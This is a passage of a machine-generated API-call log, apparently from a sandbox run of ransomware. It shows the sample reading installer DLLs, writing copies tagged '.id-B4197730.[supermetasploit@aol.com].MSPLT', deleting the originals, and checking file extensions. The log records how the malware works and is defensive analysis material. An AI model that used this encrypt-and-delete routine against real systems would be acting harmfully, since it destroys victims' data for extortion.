liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.693] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.693] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0168.694] GetLastError () returned 0x0 [0168.694] ReadFile (in: hFile=0x2f8, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x232c8, lpOverlapped=0x0) returned 1 [0168.719] WriteFile (in: hFile=0x300, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0x232d0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0x232d0, lpOverlapped=0x0) returned 1 [0168.724] ReadFile (in: hFile=0x2f8, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0168.725] WriteFile (in: hFile=0x300, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0xf8, lpOverlapped=0x0) returned 1 [0168.725] SetEndOfFile (hFile=0x300) returned 1 [0168.725] CloseHandle (hObject=0x300) returned 1 [0169.031] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0169.031] SetEndOfFile (hFile=0x2f8) returned 1 [0169.034] CloseHandle (hObject=0x2f8) returned 1 [0169.034] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0169.034] DeleteFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll")) returned 1 [0169.035] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0169.035] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0169.035] lstrlenW (lpString=".doc") returned 4 [0169.035] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0169.035] lstrlenW (lpString=".docx") returned 5 [0169.035] lstrcmpiW (lpString1=".docx", lpString2="E.dll") returned -1 [0169.035] lstrlenW (lpString=".pdf") returned 4 [0169.035] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0169.035] lstrlenW (lpString=".xls") returned 4 [0169.035] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0169.035] lstrlenW (lpString=".xlsx") returned 5 [0169.035] lstrcmpiW (lpString1=".xlsx", lpString2="E.dll") returned -1 [0169.035] lstrlenW (lpString=".ppt") returned 4 [0169.035] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0169.035] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0169.035] lstrlenW (lpString=".zip") returned 4 [0169.035] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0169.035] lstrlenW (lpString=".rar") returned 4 [0169.035] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0169.035] lstrlenW (lpString=".bz2") returned 4 [0169.035] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0169.035] lstrlenW (lpString=".7z") returned 3 [0169.035] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0169.035] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0169.035] lstrlenW (lpString=".dbf") returned 4 [0169.036] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0169.036] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0169.036] lstrlenW (lpString=".1cd") returned 4 [0169.036] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0169.036] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0169.036] lstrlenW (lpString=".jpg") returned 4 [0169.036] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0169.036] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0169.036] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0169.036] lstrlenW (lpString=".doc") returned 4 [0169.036] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0169.036] lstrlenW (lpString=".docx") returned 5 [0169.036] lstrcmpiW (lpString1=".docx", lpString2="E.dll") returned -1 [0169.036] lstrlenW (lpString=".pdf") returned 4 [0169.036] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0169.036] lstrlenW (lpString=".xls") returned 4 [0169.036] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0169.036] lstrlenW (lpString=".xlsx") returned 5 [0169.036] lstrcmpiW (lpString1=".xlsx", lpString2="E.dll") returned -1 [0169.036] lstrlenW (lpString=".ppt") returned 4 [0169.036] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0169.036] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0169.036] lstrlenW (lpString=".zip") returned 4 [0169.036] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0169.036] lstrlenW (lpString=".rar") returned 4 [0169.036] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0169.036] lstrlenW (lpString=".bz2") returned 4 [0169.037] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0169.037] lstrlenW (lpString=".7z") returned 3 [0169.037] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0169.037] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0169.037] lstrlenW (lpString=".dbf") returned 4 [0169.037] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0169.037] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0169.037] lstrlenW (lpString=".1cd") returned 4 [0169.037] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0169.037] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0169.037] lstrlenW (lpString=".jpg") returned 4 [0169.037] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0169.037] Sleep (dwMilliseconds=0x64) [0169.387] Sleep (dwMilliseconds=0x64) [0169.953] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0169.953] lstrlenW (lpString="SetupResources.dll") returned 18 [0169.953] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0170.240] GetFileSizeEx (in: hFile=0x2c0, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=17240) returned 1 [0170.240] CloseHandle (hObject=0x2c0) returned 1 [0170.240] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll")) returned 0x80 [0170.851] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0170.851] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0170.851] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0170.851] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0170.852] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0170.852] GetLastError () returned 0x0 [0170.852] ReadFile (in: hFile=0x304, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x4358, lpOverlapped=0x0) returned 1 [0170.872] WriteFile (in: hFile=0x2c0, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0x4360, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0x4360, lpOverlapped=0x0) returned 1 [0170.874] ReadFile (in: hFile=0x304, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0170.874] WriteFile (in: hFile=0x2c0, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0xf8, lpOverlapped=0x0) returned 1 [0170.874] SetEndOfFile (hFile=0x2c0) returned 1 [0170.874] CloseHandle (hObject=0x2c0) returned 1 [0170.876] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0170.876] SetEndOfFile (hFile=0x304) returned 1 [0170.877] CloseHandle (hObject=0x304) returned 1 [0170.877] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0170.878] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll")) returned 1 [0170.878] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0170.878] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0170.878] lstrlenW (lpString=".doc") returned 4 [0170.878] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0170.878] lstrlenW (lpString=".docx") returned 5 [0170.878] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0170.878] lstrlenW (lpString=".pdf") returned 4 [0170.878] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0170.878] lstrlenW (lpString=".xls") returned 4 [0170.879] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0170.879] lstrlenW (lpString=".xlsx") returned 5 [0170.879] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0170.879] lstrlenW (lpString=".ppt") returned 4 [0170.879] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0170.879] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0170.879] lstrlenW (lpString=".zip") returned 4 [0170.879] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0170.879] lstrlenW (lpString=".rar") returned 4 [0170.879] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0170.879] lstrlenW (lpString=".bz2") returned 4 [0170.879] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0170.879] lstrlenW (lpString=".7z") returned 3 [0170.879] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0170.879] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0170.879] lstrlenW (lpString=".dbf") returned 4 [0170.879] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0170.879] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0170.879] lstrlenW (lpString=".1cd") returned 4 [0170.879] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0170.879] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0170.879] lstrlenW (lpString=".jpg") returned 4 [0170.879] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0170.879] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0170.880] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0170.880] lstrlenW (lpString=".doc") returned 4 [0170.880] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0170.880] lstrlenW (lpString=".docx") returned 5 [0170.880] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0170.880] lstrlenW (lpString=".pdf") returned 4 [0170.880] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0170.880] lstrlenW (lpString=".xls") returned 4 [0170.880] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0170.880] lstrlenW (lpString=".xlsx") returned 5 [0170.880] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0170.880] lstrlenW (lpString=".ppt") returned 4 [0170.880] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0170.880] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0170.880] lstrlenW (lpString=".zip") returned 4 [0170.880] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0170.880] lstrlenW (lpString=".rar") returned 4 [0170.880] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0170.880] lstrlenW (lpString=".bz2") returned 4 [0170.880] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0170.880] lstrlenW (lpString=".7z") returned 3 [0170.880] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0170.880] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0170.880] lstrlenW (lpString=".dbf") returned 4 [0170.880] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0170.880] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0170.881] lstrlenW (lpString=".1cd") returned 4 [0170.881] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0170.881] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0170.881] lstrlenW (lpString=".jpg") returned 4 [0170.881] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0170.881] Sleep (dwMilliseconds=0x64) [0171.130] Sleep (dwMilliseconds=0x64) [0171.364] Sleep (dwMilliseconds=0x64) [0171.692] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0171.692] lstrlenW (lpString="SetupResources.dll") returned 18 [0171.692] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0171.693] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=18264) returned 1 [0171.693] CloseHandle (hObject=0x344) returned 1 [0171.693] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll")) returned 0x80 [0171.693] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.695] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0171.695] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.695] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.695] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0171.695] GetLastError () returned 0x0 [0171.695] ReadFile (in: hFile=0x344, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x4758, lpOverlapped=0x0) returned 1 [0171.828] WriteFile (in: hFile=0x348, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0x4760, lpOverlapped=0x0) returned 1 [0171.830] ReadFile (in: hFile=0x344, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0171.830] WriteFile (in: hFile=0x348, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0xf8, lpOverlapped=0x0) returned 1 [0171.830] SetEndOfFile (hFile=0x348) returned 1 [0171.830] CloseHandle (hObject=0x348) returned 1 [0171.832] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.832] SetEndOfFile (hFile=0x344) returned 1 [0171.833] CloseHandle (hObject=0x344) returned 1 [0171.833] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.833] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll")) returned 1 [0171.834] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0171.834] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0171.834] lstrlenW (lpString=".doc") returned 4 [0171.834] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.834] lstrlenW (lpString=".docx") returned 5 [0171.834] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.834] lstrlenW (lpString=".pdf") returned 4 [0171.834] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.834] lstrlenW (lpString=".xls") returned 4 [0171.834] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.834] lstrlenW (lpString=".xlsx") returned 5 [0171.834] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.834] lstrlenW (lpString=".ppt") returned 4 [0171.834] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.834] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0171.834] lstrlenW (lpString=".zip") returned 4 [0171.834] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.834] lstrlenW (lpString=".rar") returned 4 [0171.834] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.834] lstrlenW (lpString=".bz2") returned 4 [0171.834] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.834] lstrlenW (lpString=".7z") returned 3 [0171.834] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.834] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0171.834] lstrlenW (lpString=".dbf") returned 4 [0171.834] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.835] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0171.835] lstrlenW (lpString=".1cd") returned 4 [0171.835] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.835] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0171.835] lstrlenW (lpString=".jpg") returned 4 [0171.835] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.835] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0171.835] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0171.835] lstrlenW (lpString=".doc") returned 4 [0171.835] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.835] lstrlenW (lpString=".docx") returned 5 [0171.835] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.835] lstrlenW (lpString=".pdf") returned 4 [0171.835] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.835] lstrlenW (lpString=".xls") returned 4 [0171.835] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.835] lstrlenW (lpString=".xlsx") returned 5 [0171.835] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.835] lstrlenW (lpString=".ppt") returned 4 [0171.835] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.835] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0171.835] lstrlenW (lpString=".zip") returned 4 [0171.835] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.835] lstrlenW (lpString=".rar") returned 4 [0171.835] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.835] lstrlenW (lpString=".bz2") returned 4 [0171.835] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.836] lstrlenW (lpString=".7z") returned 3 [0171.836] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.836] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0171.836] lstrlenW (lpString=".dbf") returned 4 [0171.836] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.836] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0171.836] lstrlenW (lpString=".1cd") returned 4 [0171.836] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.836] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0171.836] lstrlenW (lpString=".jpg") returned 4 [0171.836] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.836] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0171.836] lstrlenW (lpString="SetupResources.dll") returned 18 [0171.836] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0171.836] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=18264) returned 1 [0171.836] CloseHandle (hObject=0x344) returned 1 [0171.837] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll")) returned 0x80 [0171.837] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.837] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0171.837] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.837] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.837] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0171.837] GetLastError () returned 0x0 [0171.837] ReadFile (in: hFile=0x344, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x4758, lpOverlapped=0x0) returned 1 [0171.867] WriteFile (in: hFile=0x348, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0x4760, lpOverlapped=0x0) returned 1 [0171.869] ReadFile (in: hFile=0x344, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0171.869] WriteFile (in: hFile=0x348, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0xf8, lpOverlapped=0x0) returned 1 [0171.870] SetEndOfFile (hFile=0x348) returned 1 [0171.870] CloseHandle (hObject=0x348) returned 1 [0171.872] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.872] SetEndOfFile (hFile=0x344) returned 1 [0171.873] CloseHandle (hObject=0x344) returned 1 [0171.873] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 